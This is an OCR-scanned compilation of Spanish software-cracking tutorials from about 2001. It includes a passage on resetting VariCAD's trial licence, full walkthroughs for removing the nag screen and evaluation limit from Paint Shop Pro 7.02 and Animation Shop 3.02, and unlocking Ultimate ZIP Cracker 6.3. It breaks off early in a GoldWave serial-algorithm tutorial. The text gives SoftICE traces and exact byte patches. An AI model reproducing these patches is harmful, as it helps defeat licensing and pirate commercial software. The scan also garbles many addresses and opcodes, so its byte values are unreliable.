demasiado fácil que en el fichero hubiera aparecido la fecha en formato 
'dd-mm-yyyy hh-mm+ss'. Mmmh. Pero estos números... son siempre decimales. 
Mmmh. Veamos. Si transformamos la fecha desencriptada a decimal nos dá este 
número. búsquemoslo en el archivo. ¡BlNGO!. La sección NURBS tiene como 
primer parámetro el mimsmo número que representa la fecha desencriptada. Es 
casí demasiado fácil. 


Una lectura atenta de FileMON nos descubre el misterio completo. Cuando 
nosotros tocabamos la fecha de 78CE98 desde el SICE el patch funcionaba 
porque ¡al finalizar el programa éste se encarga de salvar el system.con!. O 
sea, que si tocamos el .Ick y el system.con simultáneamente, podremos tener 
los días de prueba que queramos. 


No tan newby 


Faltaba hacer un programa que aplicara el parche. En mi empresa, lo que más 
usamos es VB6, así que me puse a ello y aquí está el resultado (adjunto). 
Uso del Parche 

El parche es muy sencillo de manejar, aunque no sea muy profesional. 

La idea, como explicaba en el tutorial, es variar el fichero .Ick del 

directorio Mib, de manera que su desencriptado coincida con el parámetro 
NURBS del fichero system.con del directorio 1cfg (en el directorio de 
trabajo). 

Lo primero es instalar Varicad 7.3.0.4 (con la actual versión, la 8, aún no 

lo he probado, pero algo me dá que también va a funcionar). Hay que 
configurarlo y tenerlo operativo. Cada vez que lo arrancas te dice que es 
una versión trial por 30 días y que te quedan nosécuantos. Bien. 

Ahora, lo que hay que hacer es pasar el parche. Lo primero es localizar el 
fichero varicad, que normalmente estará en program files varicadMlib' y 
pinchar en desencriptar. Os mostrará el contenido desencriptado del fichero, 
y podréis reconocer el nombre de usuario que elegistéis en la fase de 
registro del producto. También veréis las fechas de inicio y fin del periodo 
de licencia. Podeis modificar sólo la de nuevo fin del periodo (cambiad por 
ejemplo el año, y ponéis 10 años más), y veréis que automáticamente os 
aparece a la derecha un número. Es el número de segundos desde el 1-1-1970 
hasta la fecha de fin de licencia que habéis puesto. Tomad nota de éste 
número y del que corresponde a la antigua fecha de fin de licencia, porque 
los vais a necesitar. Hay un botón que dice 'Reencriptar', apretadlo. Éste 
creara una fichero varicad.Ick.new en el directorio Wib. Hay que coger el 
fichero con la licencia original (varicad.Ick) y renombrarlo (por ejemplo, a 
varicad.Ick.old). Ahora cogemos el fichero recién creado (varicad.Ick. new) y 
lo renombramos a (varicad.Ick). Luego vamos al directorio de trabajo 
(normalmente WVaricad) y, en el directorio 1cfg veréis un fichero 
(system.con). Copiadlo para prevenir desastres. Abridlo con el notepad. 
Buscad la linea en que aparece el número correspondiente a la antigua fecha. 
Cambiadlo por el correspondiente a la nueva fecha. Salvadlo. Abrir el 
programa Varicad. Si todo ha ido bien, el NAG inicial debería decir algo así 
como 'Versión trial por 30 días, de los que quedan 3650". 

Yastá. 

Últimas palabras 


Como programador profesional, no me gusta desproteger los programas. Me 
parece poco ético que alguien venga y te impida ganar algo de dinero 
comercializando un producto que te ha costado un esfuerzo importante. Sin 
embargo, como programador autodidacta, me parece importante compartir 
conocimientos con otros. Por eso he hecho este tutorial y lo publico ahora 

que VariCAD ha sacado una nueva versión que seguramente este protegida de 
manera diferente. 


Que sepaís que desde que me puse a ello seriemente, el esfuerzo ha sido de 
unas 30 o 40 horas, repartidas en 3 semanas de febril actividad. Supongo que 
un cracker con experiencia lo podría haber hecho en unas 5 o 6 horas, quizá 
menos. 

Mil gracias a nuMI'T_or y a karpoff por su apoyo constante. Chicos, sois muy 
majos... 

Mil gracias también a ProfesorX por publicar los tutoriales que me han 
enseñado tanto. 


Saludos, OGRY. 
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Programa: Paint Shop Pro 7.02 y Animation Shop 3.02 


PROTECCION: Evaluación de 30 dias 
Descripcion: Límite de tiempo y nags-screen 
Dificultad: Aficionado 
DOWNLOAD : http://www. Jasc.com 
Hex WorkShop 2.20b005 
AP SOftICE 4.0 
OPA KrackPE ( de nuMIT_or (KUT) ) 
KW32dasm 8.93 
CRACKER: Fantomas | FECHA: 30/05/2001 


INTRODUCCION 


Antes que nada, voy a comentar que esta aplicacion siempre me ha parecido fabulosa desde sus primeras 
versiones, sin embargo hasta antes de la version 6.xx, era muy facil volver a tener otros 30 dias de 
evaluacion, simplemente borrabas del registro la entrada 
[HKEY_CLASSES_ROOTICLSIDY(10722D20-FD67-11CE-A6F7-444553540000 MiscStatus] 

y voila 'primer dia de evaluacion", aunque siempre te aparecia el Nag de inicio 


Esta es la primer aplicacion que analizo, y fue despues de leer algunos tutoriales y ejemplos de 'Karpoff, en 
especial el de 'Paint Shop Pro 7.0 y Animation Shop 3.0', articulo de 'kamui' del 20/02/2001 


Sucede que al tratar de seguirle los pasos a 'kamui' me tope conque la aplicacion era diferente, tal parecia que 
los de 'Sasc' tambien lo leyeron y corrieron a sacar la version 7.02, la cual ya es distinta 


AL ATAKE 


Iniciemos conociendo como se comporta la aplicacion mediante unas pruebas de rutina: 


- Corremos la aplicacion y mediante el aviso del menu 'Help', se nos hace de nuestro conocimiento el siguiente, 
mensage: "You are on day 16 of your 30 day evaluation period" 

- Salimos de la aplicacion 

- Adelantemos el reloj 10 dias 

- Corremos nuevamente la aplicacion y ahora vemos el siguiente mensage: "You are on day 26 of your 30 day 
evaluation period" 


Hasta aqui, podemos observar que la aplicacion utiliza la fecha del sistema para evaluar el uso del periodo de 
evaluacion (30 dias), y mostrar el resultado en el NAG inicial, asi que lo primero que haremos sera utilizar 'BPX 
GetSystemTime' 


Corremos el Loader32 del Softlce y cargamos la aplicacion, se habre el Softlce indicando un error al inicializar 
015F:0083332c INVALID 
continuamos con 'FS', desaparece Softlce por unos momentos y regresa en la siguiente direccion 


KERNEL32!GetSystemTime 
015F:BFFADAC6 SUB” EDX,EDX Ron Aqui estamos 
015F:BFFADACS PUSH BFFA18BC 
015F:BFFADACD PUSH DWORD PTR FS:[EDX] 
015F:BFFADADO MOV  FS:[EDX],ESP 
015F:BFFADAD3 MOV  ECX, [ESP+0C] 
015F:BFFADAD7. ADD  BYTEPTR [ECX],00 
015F:BFFADADA ADD  BYTEPTR [ECX+0F],00 
015F:BFFAOADE 


seguimos corriendo la aplicacion con 'FS' esperando que aparesca el NAG y nada todavia, pero nuevamente volvemos 
a la direccion 


015F:BFFADAC6 SUB  EDX,EDX 


una vez mas 'FS' y ahora si tenemos enfrente el NAG ( presionando 'F4' para ver atras del Softlce ), continuamos y 
cerramos la aplicacion 


Corremos nuevamente el proceso anterior, pero ahora nos detenemos en la segunda interrupcion, dado que si 
presionamos 'ES' nos aparece el NAG y queremos evitar eso, asi que presionamos 'F12' para ver quien hizo la llamada 


015F:780271E0 CALL  [KERNEL32!GetSystemTime] 


015F:780271E6 MOV  AX,[EBP-16] Ra Aqui estamos 
015F:780271EA CMP — — AX,[7803EFF2] 
015F:780271F1 


checamos con 'F4' y nada, todavia no apacere el NAG, asi que nuevamente va 'F12", que nos regresa a 


015F:005E0061 CALL  [00872A08] 

015F:005E0067 MOV  ECX,[ESP+1C] O Aqui estamos 
015F:005E006B MOV  EDX,[ESP+40] 

015F:005E006F PUSH ECX 

015F:005E0070 PUSH EDX 

015F:005E0071 CALL [00872AFC] 


checamos nuevamente con 'F4' y nada, todavia no apacere el NAG, asi que nuevamente va 'F12', que nos regresa a 


015F:0073609A CALL  005DFD10 
015F:0073609F PUSH 78 rr Aqui estamos 


015F:007360A1 CALL  008318D8 
015F:007360A6 MOV  ESLEAX 
015F:007360A8 ADD — ESP,04 
015F:007360AB MOV  [ESP+0C],ESI 


checamos nuevamente con 'F4' y nada, nuevamente va 'F12', que nos regresa a 


015F:00621CF8 CALL  00735FEO 

015F:00621CFD ADD — ESP,04 O > Aqui estamos 
015F:00621D00 CALL  0083279C 

015F:00621D05 TEST  ESLESI 


checamos nuevamente con 'F4" y al fin sale el NAG, de este modo conocemos que la rutina que muestra el NAG es 
00735FEO, asi que pensando en eliminar esta rutina, sustituiremos esta llamada por NOPs, desde la direccion 
00621CF8 hasta la direccion 00621 CFB 


para ello usamos el KrackPE de nuMIT_or, le introducimos la direccion virtual 00621CF8 y obtenemos el offset 
00221CF8 


ahora cargamos la aplicacion en el 'Hex WorkShop' nos vamos a la direccion 00221CF8 y cambiamos ESE3421100 
por 9090909090 


Listo eliminamos el NAG pero NO hemos terminado, aunque eliminamos el NAG, el limite del tiempo de evaluacion 
sigue contando (es facil de corroborar: una vez eliminado el NAG, carga la aplicacion y oviamente no debe aparecer el 
NAG, ve al menu 'Help', veras una ventana similar al NAG, y puedes checar que el tiempo sigue corriendo) 


A ol e lol eo ode e ole ole oe le ol ol ole o ol le ode e e ole ole a o e Ra 


Corremos el Loader del Softlce y cargamos la aplicacion, despues del mensage de 'Error de carga ...' se habre el 
Softlce indicando un error al inicializar, continuamos con 'FS', desaparece Softlce por unos momentos y regresa en la 
siguiente direccion 


KERNEL32!GetSystemTime 


0O15F:BFFADAC6 SUB  EDX,EDX rr Aqui estamos 
015F:BFFAODAC8 PUSH BFFA18BC 

015F:BFFADACD PUSH DWORD PTR FS:[EDX] 

015F:BFFADADO MOV  FS:[EDX],ESP 

015F:BFFADAD3 — MOV  ECX, [ESP+0C] 

015F:BFFADAD7 ADD  BYTEPTR [ECX],00 

0O15F:BFFADADA ADD  BYTEPTR [ECX+0F],00 

015F:BFFADADE 


observemos que estamos dentro de la libreria KERNEL32!, y aqui aunque quisieramos, no podriamos hacer nada. 


presionando la tecla 'F12", salimos de la subrutina 


015F:780271D2 LEA  EAX,[EBP-10] 

015F:780271D5 PUSH EAX 

015F:780271D6 CALL  [KERNEL32!Getlocal Time] 

015F:780271DC LEA  EAX,[EBP-20] 

015F:780271DF PUSH EAX 

015F:780271E0 CALL [KERNEL32!GetSystemTime] 

015F:780271E6 MOV — AX,[EBP-16] O a Aqui estamos 
015F:780271EA CMP.—— AX,[7303EFF2] 

015F:780271F1 


ahora, estamos dentro de la libreria MSVCRT!, y no es esta la que nos interesa analizar 


por lo tanto presionamos 'F12' para salir de esta subrutina y caemos en 


015F:005E005C LEA — EAX,[ESP+3C] 
015F:005E0060 PUSH EAX 
015F:005E0061 CALL  [00872A08] 
015F:005E0067 MOV  ECX,[ESP+1C] 0 S mnnrnooo- Aqui estamos 
015F:005E006B MOV  EDX,[ESP+40] 
015F:005E006F PUSH ECX 
015F:005E0070 PUSH EDX 
015F:005E0071 CALL  [00872AFC] 
015F:005E0077 ADD — ESP,0D 
015F:005E007A CALL - 00832F70 
015F:005E007F CMP.—  EAX,EBX 
015F:005E0081 JGE OOSEO0OA 1 
015F:005E0083 PUSH 0096D6D8 
015F:005E0088 CALL [00872A10] 
015F:005E008E 


ahora estamos dentro de la aplicacion 


veamos que pasa aqui 


ESP=014FF968 
015F:005E0067 MOV ECX,[ESP+1C] 
ECX=3B032B10 


aqui rescato la fecha local (la de la aplicacion), colocandola en ECX 


015F:005E006B MOV EDX,[ESP+40] 
EDX=3B29635F 


aqui rescato la fecha del sistema, colocandola en EDX 


015F:005E006F PUSH ECX 
015F:005E0070 PUSH EDX 
015F:005E0071 CALL [00872AFC] 


esta ultima subrutina, es una simple resta, (EAX = EDX - ECX >) 


EAX=0026384F 


015F:005E0077 ADD ESP,0D 
015F:005E007A CALL 00832F70 
015F:005E007F CMP EAX,EBX 

015F:005E0081 JGE OO5E0OA 1 


aqui lleva a cabo algunas operaciones y preparaciones, y finalmente se lleva a cabo una comparacion para proceder 
con el salto segun corresponda 


Ahora solo nos queda saber que vamos hacer, a diferencia de muchos autores, no modificaremos el salto (OF8D) JGE 
por (0F8C) JNGE,vamos a intentar algo diferente, veamos la siguiente instruccion 


015F:005E006B MOV EDX,[ESP+40] 
EDX=3B29635F 


si la sustituimos por 


015F:005E006B MOV EDX,[ESP+1C] 
ECX=3B032B10 


de tal forma que la aplicacion siempre mostrara el mensage: "You are on day 1 of your 30 day evaluation period", para 
ello usamos el KrackPE de nuMIT_or, le introducimos la direccion virtual 0OSE006B y obtenemos el offset 001 E006B 


ahora cargamos la aplicacion en el "Hex WorkShop' nos vamos a la direccion 001E006B y cambiamos 8B542440 por 
8B54241C 


Listo eliminamos el periodo de evaluacion 
*La amenaza elegante* 


En el caso de Animation Shop 3.02, el mecanismo de analisis es similar, lo unico que cambia en este caso son las 
direcciones, donde la siguiente instruccion 


015F:004FBO5D CALL [00542CA0] 
si la eliminamos con NOPs 


cargamos la aplicacion en el "Hex WorkShop' nos vamos a la direccion OOOFBO5D y cambiamos E83E7C0400 por 
9090909090 


Listo eliminamos el NAG 

para el caso del periodo de evaluacion, obtenemos 
015F:004EA60C MOV EDX,[ESP+40] 

si la sustituimos por 

015F:004EA60C MOV EDX,[ESP+18] 


esto es cargamos la aplicacion en el 'Hex WorkShop' nos vamos a la direccion OOOEA60C y cambiamos 8B442440 por 
8B442418 


Listo 'eliminamos' el periodo de evaluacion 


*La amenaza elegante* 


El presente documento, es una tarea cientifica de investigacion, con caracter docente, no pretende violar ninguna ley 
vigente, el autor no se hace responsable del uso, manejo o practicas inadecuadas del analisis presentado (:0) 


sobre 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


ULTIMATE ZIP CRACKER 6.3 


Versión "demo" con todo deshabilitado. 
Conseguir un programa totalmente funcional. 
Para recuperar contraseñas perdidas. 
Principiante. 
http://www.home.ru/vdg/uzc.htm 


Softice 3.24, Exescope 6.0, W32Dasm 8.9, un editor hexadecimal. 
Arkanian FECHA: 20/06/2001 


INTRODUCCION 


"¿Perdiste la contraseña de uno de tus archivos comprimidos a través de ZIP?. Con Ultimate ZIP Cracker 
podrás recuperar esas contraseñas perdidas sin gran esfuerzo. El programa es capaz de utilizar varios 
métodos de recuperación de contraseñas, como es el caso del método de fuerza bruta, a través de búsquedas 
en diccionarios, y a través de fechas de nacimiento. Además, podrás especificar el rango de longitud de la 
contraseña y el tipo de carácteres que contiene, y por supuesto seleccionar el método de búsqueda de la 
contraseña. Mejoras en la nueva versión: Nueva utilidad para recuperar contraseñas, soporta ZIP, ARJ, 
Word y Excel en todas sus versiones, mucho más veloz (especialmente trabajando con archivos ZIP), 
diccionario más amplio, etc. Limitaciones de la versión shareware: Sólo podrás ver las contraseñas a través 
del método de "Brutal Force Attack". 


Impresionante, ¿no?, pues es mentira. La limitación del programa es que solo muestra las contraseñas 
compuestas de uno, dos y tres caracteres. Para contraseñas de cuatro caracteres en adelante aparece una 
ventana del tipo "Contraseña encontrada. Si quieres verla, pasa por caja". 


Y es que no te puedes ya ni fiar de la publicidad. Publicidad engañosa se le llama a esto. 


Realmente se pueden usar cualquiera de los numerosos métodos de búsqueda que trae el programa, pero 
limitado a contraseñas de tres caracteres, para cuatro o más de cuatro ...ya sabes, opción "Purchase the full 


version”. 


Vamos a ver como hacerlo para "liberar" totalmente el programa y convertirlo en algo útil. 


Empezamos... 


AL ATAKE 


UNA PRUEBA PRELIMINAR 


Instalamos el programa, el Setup trae por defecto como User name "Trial version user” sin posibilidad de 
modificación, ...ya veremos. 


Lo ejecutamos y le decimos que si, que [ Agree, en la ventana que nos recuerda lo pobres que somos. El programa se 
inicia con un enorme y antiestético "trial version'' como título de la ventana principal. 


Investigamos un poco y vemos que no hay otra opción de registro que la que nos manda a la página de esta gente. 
Humm ... en el About hay un par de campos tipo edit atenuados, podemos posicionar el cursor pero no los podemos 
modificar, ...de momento. 


Cogemos cualquier archivo, le metemos un "Add to zip", le ponemos una contraseña facil del tipo 1212 y probamos el 
programita de marras. En menos de 7 segundos obtenemos el siguente resultado: 


Detection process is done E 


Total files: [Y 
Encrypted files: (A 
Passwords detected: | 
Passwords shown: [a 


Some passwords detected were not shown. This is a: 
trial version: liritatiora. 

The full version of Ultimate ZIP Cracker always 
displays passwords detected, 

Please visit product's home page to purchase the full 
version. 


Click View data' to view the begining of the files to 
ensure that the passwords were really detected, 


Click 'Get password right hicw' to get your password 
anyway. 


Home page View data 
Get password right now! | 


El Home page nos manda a la página de los creadores del programa, Get password right now! nos manda a un 
formulario de envio de correo, donde les mandamos el archivo cuya contraseña queremos averiguar como archivo 
adjunto, ellos averiguan la contraseña y nos la reenvian después de pasar por caja. También nos avisan que no valen 
correos anónimos tipo hotmail o similar, que astutos. 


Para más inri el botón View data muestra los cien primeros bytes del archivo para que veas que realmente ha 
encontrado la contraseña, realmente injurioso. 


PLANIFICACION 
Vamos a ver que nos cuenta el eXeScope. Rápidamente localizamos en Resource / Dialog la ventanas interesantes: 
e -. Resource / Dialog / 100 --> La ventana del About. 


e -. Resource / Dialog / 107 --> Ventana del Setup donde trae por defecto el "Trial version user". 
e -. Resource / Dialog / 122 --> "Thank you for trying... ', la ventana de inicio del [ Agree. 


e -. Resource / Dialog / 140 --> "Detection process is done”, ...curiosísimo. 
e -. Resource / Dialog / 141 --> La ventana que muestro en la imagen de arriba. 


Muy interesante, tenemos dos diálogos con el mismo título, el 140 y el 141, "Detection process is done"', uno es el de 
la versión shareware y el otro por sus caraterísticas tiene todas las pintas de ser el de la versión completa. Echadle un 
vistazo al diálogo 140 y comparadlo con el 141. 


ee Detection process is done ES 


Total files: | 
Encrypted files: | 
Passwords detected; Í 


se | 


¿Me equivoco?, creo que no... 


Parece que lo tenemos claro. Si planificamos la estrategia a seguir veremos que lo que hay que hacer es lo siguiente: 


e -. Modificar el nombre de usuario de forma que seamos nosotros y no el "Trial version user”. 
e -. Saltar por encima de la ventana del "Thank you for trying...', shareware, etc... 
e -. Que cuando descubra una contraseña de cuatro o más caracteres vaya al diálogo 140 y no al 141. 
e -. Modificar el antiestético "trial version" del título de la ventana del programa. 
VAMOS ALLA... 


Primer punto, el usuario de programa. 


Primero desinstalamos el programa y lo volvemos a instalar, ¿porqué?, pues por que la cosa funciona de la siguiente 
manera: 


El programa de instalación se llama Ultimate.exe y esta comprimido, cuando lo ejecutamos nos muestra la ventana del 
Setup y a la vez se descomprime en C.1WindowsYTemp un archivo llamado UZC.exe que es el que realmente se 
encarga de la instalación. 


Es decir la ventana del Setup que aparece en pantalla NO es la misma que la del Resource / Dialog / 107. Para 
aclararnos estos son los diferentes archivos que intervienen: 


e -. Ultimate.exe --> El programa comprimido con su ventanita de Setup y que se descomprime en... 
e -. CAWindowsTempWUZC.exe --> El programa real de instalación que nos instala .... 
e -. C.Mrchivos de programaNUZcWUzc.exe --> El ejecutable del programa. 


Lo que hay que hacer es modificar el contenido del User name de la ventana del Setup de Ultimate.exe, y esto lo 
hacemos con Softlce. 


Esperamos que aparezca la ventana del Setup, hacemos un Ctrl+D, vamos a Softlce y hacemos la busqueda: 


. S 30:0 LFFFFFFFFFE "Trial version user''--> Buscamos... 
Pattern found at 30:809CSED2 (809 C8ED2) -- > Encontramos esto... 
S --> Por si acaso. 
Pattern found at 30:C0F39154 (C0F39154) --> El eco de la búsqueda. 


Modificamos en la Ventana de Datos, columna de ASCII, lo del Trial... por nuestro nombre, ARKANIAN. La cosa 
queda tal que, ARKANIANrsion user, para subsanar esto pulsamos el tabulador, nos vamos a la sección hex y 
machacamos los valores de rsion user con ceros. 


Una vez finalizada la instalación del programa, en la ventana About ya aparece nuestro nombre. Perfecto... 


Punto segundo, por encima del "Thank you for trying...” 


Para este punto necesitaremos echar un vistazo al código de Uzc.exe con W32dasm. Encontramos esto en Dialog 
Information, al principio del código desensamblado. 


Name: DialogID_007A, + of Controls=010, Caption:"Ultimate ZIP Cracker" 
001 - ControlID:FFFF, Control Class:"" Control Text:"" 

002 - ControlID:FFFF, Control Class:"" Control Text:"Thank you for trying 
003 - ControlID:FFFF, Control Class:"" Control Text:"" 

004 - ControlID:FFFF, Control Class:"" Control Text:"I understand that 1 
005 - ControlID:0001, Control Class:"" Control Text:"8zI Agree" 

006 - ControlID:03EC, Control Class:"" Control Text:"SRegister" 

007 - ControlID:0002, Control Class:"" Control Text:"$-Quit" 

008 - ControlID:FFFF, Control Class:"" Control Text:"Please note that th 
009 - ControlID:FFFF, Control Class:"" Control Text:"" 

010 - ControlID:FFFF, Control Class:"" Control Text:"Unregistered version 


Se trata, evidentemente, de nuestra ventana que es identificada por el nombre de DialogID_007A. Para ir al código 
pulsamos DLG Ref en la barra de herramientas, localizamos el diálogo 7A y nos plantamos aquí: 


* Referenced by a CALL at Address: 

1:00414939 

| 

:00403DF0 8B442404 mov eax, dword ptr [esp+04] 
:00403DF4 56 push esi 

:00403DES5 50 push eax 

:00403DF6 8BFl1 mov esi, ecx 


* Possible Reference to Dialog: DialoglID_007A --> La ventana dichosa. 


:00403DF8 6A7A push 0000007A --> Guarda el identificador. 

:00403DFA E857650200 call 00424356 --> Nos vamos a la ventana shareware. 
:00403DFF C706308D4300 mov dword ptr [esi], 00438D30 

:00403E05 8BC6 mov eax, esi 

:00403E07 SE pop esi 

:00403E08 C20400 ret 0004 


Hemos aterrizado aquí provenientes de una llamada en 00414939, así que, si vamos a esa dirección y buscamos hacia 
arriba, todos los saltos que encontremos y que nos permitan saltar por encima de esta dirección serán de lo más 
sospechoso. 


Estamos en 00414939, un poco más arriba encontramos unas referencias a unas comprobaciones en el registro: 


ADVAP132.RegOpenKeyExA, Ord:0172h 
ADVAPI32.RegQueryValueExA, Ord:017Bh 
ADVAPB2.RegCloseKey, Ord:015Bh 


Pero no se trata de lo que estamos buscando ya que a continucion viene: 
* Possible StringData Ref from Data Obj ->'"Ultimate ZIP Cracker was not succesfully... instalado"' 


Parece que las referencias anteriores simplemente buscan si el programa esta instalado mediante una comprobación de 
las claves en el registro de Windows, sigamos un poco más arriba: 


:0041488E 8B442410 mov eax, dword ptr [esp+10] 

:00414892 64892500000000 mov dword ptr fs:[00000000], esp 
:00414899 81ECB8010000 sub esp, 000001B8 

:0041489F 3D34120000 cmp eax, 00001234 --> Que curioso. 
:004148A4 56 push esi 

:004148A5 57 push edi 


:004148A6 8BF1 mov esi, ecx 

:004148A8 0F8510010000 jne 004149BE --> Muy sospechoso. 
:004148AE 8D442408 lea eax, dword ptr [esp+08] 

:004148B2 50 push eax 

:004148B3 6819000200 push 00020019 

:004148B8 6A00 push 00000000 


Hagamos las comprobaciones pertinentes con Softlce, metemos el programa en el Loader y cuando rompa nos vamos 
mediante un G 4148A8 al salto en cuestión. Vemos que, efectivamente, EAX es 1234 y que por consiguiente no vamos 
a saltar, así que, si cambiamos el flag con un R FL Z saltamos y ... adios horrible ventana. 


Tomemos nota, el salto está en 4148A8, la instrucción del salto se compone de 6 bytes, OF 85 10 01 00 00, Queremos 
transformar este salto de condicional (¡ne) a incondicional (¡mp) sin que sobre ni falte nada. La mejor manera de 
hacerlo es la siguiente: 


-. Hacemos D EIP de manera que en la ventana de datos tengamos OF 85 10 01 00 00. 
. Nopeamos manualmente la instrucción con 90 90 90 90 90 90. 

-. Ensamblamos la linea mediante A 4148A8 [intro] JMP 4149BE [intro]. 

-. Tomamos nota de como queda la cosa --> E9 11 01 00 00 90. 


Liquidada la ventana de shareware, sigamos al próximo objetivo. 
Punto tercero, ¡Quiero ver las contraseñas! 


Localizamos las dos ventanas en el Dialog Information, son las ventanas DialogID_008C y DialogID_008D y cuyo 
Caption es "Detection process is done". Pensemos un poco, si el programa nos suelta la ventana de "contraseña 
encontrada pero no te la enseño" en algún lugar de la memoria tiene que estar la contraseña y obviamente en algún 
lugar tiene que hacer la comprobación del número de caracteres. 


Vamos a ver, si ponemos el bp adecuado y conseguimos romper con Softlce ANTES de que aparezca la ventana, la 
contraseña estará por algún lado. Si hacemos una busqueda en memoria de la contraseña encontraremos la dirección 
donde se encuentra. Poniendo después un bp en el rango de memoria de esa dirección y repitiendo el proceso 
encontraremos donde se hace la comparación del número de carateres. 


A priori debería funcionar, solo hace falta buscar el bp adecuado. Miremos el código. Buscamos DialogID_008D, y 
vemos que hemos aterrizado aquí después de una llamada en 00414A5A , vamos a esa dirección y nos encontramos 
con esto: 


* Reference To: USER32.MessageBeep, Ord:01BDh --> MessageBeep, un bp precioso :-) 


:00414A40 FF15E0834300 Call dword ptr [004383E0] 

:00414A46 8B8680000000 mov eax, dword ptr [esi+00000080] 

:00414A4C 6A00 push 00000000 

:00414A4E 850C0 test eax, eax 

:00414A50 0F349F000000 je 00414AF5 

:00414A56 8D4C2414 lea ecx, dword ptr [esp+14] 

:00414A5A ESCIE4FEFF call 00402F20 --> La llamada al DialogID_008D. 


Ya tenemos nuestro bp, vamos a iniciar la caza. Elegimos el archivo, definimos el método de busqueda como Brute 
force attack y selecionamos en allowed characters solamente Digits para acortar el tiempo de busqueda ya que 


partimos con la ventaja de saber la contraseña. 


Vamos al Softlce, asignamos las ventanas como siempre, ponemos un BPX MESSAGEBEEP, volvemos y le damos 
al Start. Salta el Sice y aterrizamos en USER32.MessageBeep, un Fl1 para salir al código real. 


Iniciamos la busqueda en el selector que marca la ventana de hexadecimal, en mi caso 017F: 


S 017F:0 LFFFFFFFFFF "1212" 
Pattern found at 017F:00466014 (00466014) 


Solo hay una referencia y por si faltaba algo para estar completamente seguros la cabecera de la ventana de datos nos 
marca un UZC!data+00023014. 


Perfecto, quitamos el bp de antes y ponemos un BPM 466014 RW, nos ponemos una ventana de control mediante 
DEX 3 466014 e iniciamos otra vez el proceso. Salta el bp en 414F7D y empezamos a darle con alegria al F5. 


Parece que estamos de suerte, el programa utiliza la dirección 466014 como lugar de prueba de TODAS las 
contraseñas que va generando. Solo tenemos que esperar a que aparezca la nuestra en la ventana de control. Como esto 
puede tardar algún tiempo cambiamos el bp de BPM 466014 RW a BPM 466017 RW. 


¿Porqué ponemos el bp en 466017 y no en 466014? 


Sabemos que la contraseña consta de cuatro caracteres y que son todo números, si ponemos el bp en 466014, Softlce 
saltará cuando el programa empieze a comprobar los valores del primer carácter, del primero y del segundo, etc... 
Poniendo el bp en la posición que ocupa el cuarto carácter sólo saltaremos cuando se comprueben valores compuestos 
de cuatro digitos y así nos ahorraremos un montón de tiempo. 


Una vez que ha aparecido el 1212 en la dirección 466014 empezamos a trazar con F8, pasamos por un par de ret's y 
salimos aquí: 


:004141A3 8BD8 mov ebx, eax --> Aparecemos aquí. 

:004141A5 8DBC24AC000000 lea edi, dword ptr [esp+000000AC] --> Nuestra contraseña a EDI. 
:004141AC 83C9FF or ecx, FFFFFFEF --> ECX hace de contador. 
:004141AF 33C0 xor eax, eax --> Ponlo a 00 para luego. 

:004141B 1 F2 repnz --> Cuenta los caracteres de 

:004141B2 AE scasb --> la contraseña que están en EDI. 
:004141B3 F7D1 not ecx --> ¿No hay más? 

:004141B5 49 dec ecx --> Quítale el último que es un 00. 
:004141B6 83F904 cmp ecx, 00000004 --> ¿Son cuatro caracteres? 
:004141B9 736€ jnb 00414229 --> Ventanazo que te crio... 
:004141BB 8D8C24AC000000 lea ecx, dword ptr [esp+000000AC] 
:004141C2 8D54241C lea edx, dword ptr [esp+1C] 

:004141C6 51 push ecx 

:004141C7 52 push edx 

:004141C8 8944241C mov dword ptr [esp+1C], eax 


Nopeamos el salto fatídico mediante un par de 90's y aquí Paz y después Gloria. Nos sale la ventana del Resource / 
Dialog / 140 y además las contraseñas se muestran en el campo Password de la ventana principal. Estupendo... 


Punto cuarto, cuestiones estéticas. 
Este es el más sencillo, con un Editor hexadecimal vamos a realizar los cambios pertinentes en programa. Buscamos la 


cadena "- trial version'' y o bien lo ponemos todo a 00 o mejor todavía personalizamos el programa, de paso 
aprovechamos para realizar el resto de los cambios. 


| DIRECCIÓN | OFFSET | VALOR | CAMBIARA 

| :00410AB1 | 10AB1 | 747269616C... | 0000000000... 

l :004148A8 | 148A8 | 0F 8510010000 | E9110100 0090 

| :004141B9 | 141B9 | 73 6É | 90 90 | 


Si vas a poner todo a 00 no te olvides de quitar el guión que precede a "trial versión”. 


Para darle un poco de color a la cosa y personalizar el programa he cambiado los valores de "trial version" y en vez 
de poner todo a 00 he puesto otros valores, ;- ) 


Así estaban --> 74 72 69 61 6C 20 76 65 72 73 69 6F 6E 
Así quedan --> 41 72 6B 61 6E 69 61 6E 20 32 30 30 31 


Tenemos el programa totalmente funcional y perfectamente preparado para nuestras necesidades. 


FIN 


Pues eso, hasta otra. 
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Karpoff Spanish Tutor 


GOLDWAVE 4.21 


Serial Number. 

Desmontar el algoritmo de generación del Serial. 
Programa de edición de audio. 

Principiante. 

http://www.goldwave.com 


Softlce 3.24, papel y algo para escribir. 


Arkanian FECHA: 


INTRODUCCION 


25/03/2001 


Un impresionante programa de edición de audio que apenas ocupa 2 Mb con ayuda y todo. Lástima que este 
en ingles, bueno, algún fallo tenía que tener, el mundo no es perfecto. 


El Número de Serie válido correspondiente a los datos introducidos en la ventana de registro se genera a 
traves de un curioso algoritmo (si no sabes lo que es un algoritmo consulta un diccionario) que vamos a tratar 
de descifrar. Como resultado obtendremos un código valido para este programa y para todas las futuras 
versiones del mismo, o por lo menos así lo pone en la ayuda... 


No esperes encontrar aquí un Número de Serie válido sino el procedimiento y la forma en la que este se 


genera. 


No hacen falta grandes conocimientos matemáticos sino ganas de ejercitar las neuronas, un poco de atención, 
bajar al bar a por tabaco y dos elementos imprescindibles, papel en abundancia y algo para escribir. ¿Tienes 
de todo?, pues ya está. 


Empezamos... 


AL ATAKE 


VISTAZO PRELIMINAR 


Supongo que a estas alturas no hará falta que explique que bp's utilizar para saltar a Softlce. Pero bueno, en beneficio 
de los menos preparados de todos vosotros iremos (otra vez) paso a paso. Bien, después de ejecutar el programa vamos 
a la ventana de registro que se encuenta en Options / Register y que una vez rellenados todos los datos tiene este 
aspecto: 


First Name: [ARK 
Last Name: [ar KANIAN 3 
Password: A Help | 


Como se puede comprobar, tres cajas de edición, dos para el nombre y una para el Password, por cierto el Password 
que he metido y que está oculto por los asteriscos es 1234567890. 


Crtl+D, cambiamos a Softlce y aquí podemos optar por varios caminos: 


-. Una busqueda mediante al comando $ de, por ejemplo el Last Name, ARKANIAN en este caso, para 
